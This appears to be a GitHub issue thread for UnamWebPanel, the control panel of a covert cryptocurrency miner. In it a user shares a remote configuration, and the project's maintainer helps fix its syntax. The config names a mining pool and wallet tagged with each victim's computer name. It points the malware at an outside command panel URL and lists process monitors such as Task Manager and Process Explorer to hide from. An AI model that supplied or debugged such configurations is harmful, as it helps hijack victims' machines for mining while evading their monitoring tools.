### ISSUE TITLE
switching miners webpenal

### ISSUE THREAD

**Issue by DARK-DEVIL-66** [UnamSanctam/UnamWebPanel#304]
i builting time never metioned miners web penal url(api end point url)
but i mentioned remote config url

now can switch web penal url of my choice any time ? like tish with remote config

{
    "algo": "rx/0",
    "pool": "xmr.2miners.com",
    "port": 12222,
    "wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC.{COMPUTERNAME}",
    "password": "x",
    "nicehash": false,
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 5,
    "idle-cpu": 80,
    "api-endpoint": "http://ns-neatgroups.net/api/endpoint.php"
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "stealth-fullscreen": false
}

**Comment by DARK-DEVIL-66** [comment]
i am using 3.1.1 builder

**Comment by UnamSanctam** [comment]
Yes by using the "api-endpoint" option in the "Remote Configuration" you can change the web panel URL.

**Comment by DARK-DEVIL-66** [comment]
but it's not working

**Comment by UnamSanctam** [comment]
Probably because you're missing a comma (,) at the end of that line. All lines except the last one should have a comma after it.

**Comment by DARK-DEVIL-66** [comment]
"api-endpoint": "http://ns-neatgroups.net/api/endpoint.php",

it's rigth?

**Comment by UnamSanctam** [comment]
Yes that is correct.
